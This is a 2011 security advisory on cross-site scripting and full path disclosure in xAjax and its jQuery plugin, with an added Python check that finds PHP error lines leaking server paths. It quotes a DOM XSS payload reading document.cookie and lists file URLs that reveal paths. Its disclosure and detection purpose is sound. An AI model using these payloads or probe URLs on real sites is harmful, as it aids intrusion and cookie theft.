xAjax Cross Site Scripting / Path Disclosure

2011-01-20T00:00:00
ID PACKETSTORM:97707
Type packetstorm
Reporter MustLive
Modified 2011-01-20T00:00:00

Description

                                        
Hello list!
  
I want to warn you about Cross-Site Scripting and Full path disclosure  
vulnerabilities in xAjax and xajax_jquery_plugin.  
  
-------------------------  
Affected products:  
-------------------------  
  
Vulnerable are potentially all versions of xAjax. Vulnerable are all  
versions of xajax_jquery_plugin.  
  
----------  
Details:  
----------  
  
XSS (WASC-08):  
  
http://site/cms/’;alert(document.cookie);/*  
  
It is DOM Based XSS. This vulnerability particularly exists in MC Content  
Manager (which uses xAjax and XSS code executes in xAjax's JS code).  
  
Full path disclosure (WASC-13):  
  
http://site/xajax_core/legacy.inc.php  
http://site/xajax_core/xajax_lang_de.inc.php  
http://site/xajax_core/xajax_lang_nl.inc.php  
http://site/xajax_core/plugin_layer/xajaxCallableObjectPlugin.inc.php  
http://site/xajax_core/plugin_layer/xajaxDefaultIncludePlugin.inc.php  
http://site/xajax_core/plugin_layer/xajaxEventPlugin.inc.php  
http://site/xajax_core/plugin_layer/xajaxFunctionPlugin.inc.php  
http://site/xajax_core/plugin_layer/xajaxScriptPlugin.inc.php  
http://site/xajax_core/plugin_layer/xajaxDefaultRequestProcessorPlugin.inc.php  
http://site/jquery.php  
http://site/demo.php  
  
The files jquery.php and demo.php belong to xajax_jquery_plugin. These  
vulnerabilities exist at different sites and in different web applications,  
which are using xAjax and xajax_jquery_plugin.  
  
------------  
Timeline:  
------------  
  
2010.11.06 - announced at my site.  
2010.11.07 - informed developers of xAjax.  
2010.11.07 - informed developers of xajax_jquery_plugin.  
2011.01.19 - disclosed at my site.  
  
I mentioned these vulnerabilities at my site
(http://websecurity.com.ua/4661/).  
  
Best wishes & regards,  
MustLive  
Administrator of Websecurity web site  
http://websecurity.com.ua  
  
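A defender's check for the full path disclosure class (WASC-13) listed above, added here as an example; it is not code from the advisory or from xAjax. It parses saved response bodies for PHP error lines that reveal a server-side path. It assumes the disclosure takes the usual form of a displayed PHP error, which the advisory does not state; the function names and sample bodies are constructed.

```python
import html
import re

TAG_RE = re.compile(r"<[^>]+>")
# PHP's standard error line: "<level>: <message> in <file> on line <n>".
ERROR_RE = re.compile(
    r"(?P<level>Fatal error|Parse error|Warning|Notice|Deprecated):\s+"
    r".*?\s+in\s+"
    r"(?P<path>/[^\s<>\"']+|[A-Za-z]:\\[^\s<>\"']+)"
    r"\s+on line\s+(?P<line>\d+)"
)

def leaked_paths(body):
    """Return (level, filesystem path, line) for each PHP error in a response body."""
    text = html.unescape(TAG_RE.sub("", body))  # html_errors wraps fields in <b>
    return [(m["level"], m["path"], int(m["line"])) for m in ERROR_RE.finditer(text)]

def exposed_prefix(fs_path, requested):
    """Server-side directory revealed ahead of the requested URL path, if any."""
    norm = fs_path.replace("\\", "/")
    return norm[: -len(requested)] if norm.endswith("/" + requested) else None

def audit(responses):
    """Map each requested path whose response leaks a path to its findings."""
    report = {}
    for requested, body in responses.items():
        hits = leaked_paths(body)
        if hits:
            report[requested] = [
                {"level": lv, "path": p, "line": n, "root": exposed_prefix(p, requested)}
                for lv, p, n in hits
            ]
    return report

# Constructed response bodies (not real xAjax output), keyed by paths from the advisory.
SAMPLE_RESPONSES = {
    "xajax_core/legacy.inc.php":
        "<br />\n<b>Fatal error</b>:  Class 'xajax' not found in "
        "<b>/var/www/example/xajax_core/legacy.inc.php</b> on line <b>31</b><br />\n",
    "xajax_core/xajax_lang_de.inc.php":
        "Fatal error: Call to a member function register() on a non-object in "
        "C:\\inetpub\\example\\xajax_core\\xajax_lang_de.inc.php on line 12",
    "demo.php": "<html><body>demo</body></html>",
}

if __name__ == "__main__":
    for path, findings in audit(SAMPLE_RESPONSES).items():
        for f in findings:
            print(f"{path}: {f['level']} leaks {f['path']} (root {f['root']})")
```

A non-empty report for your own deployment means PHP errors are being displayed to clients for files that were never meant to be requested directly.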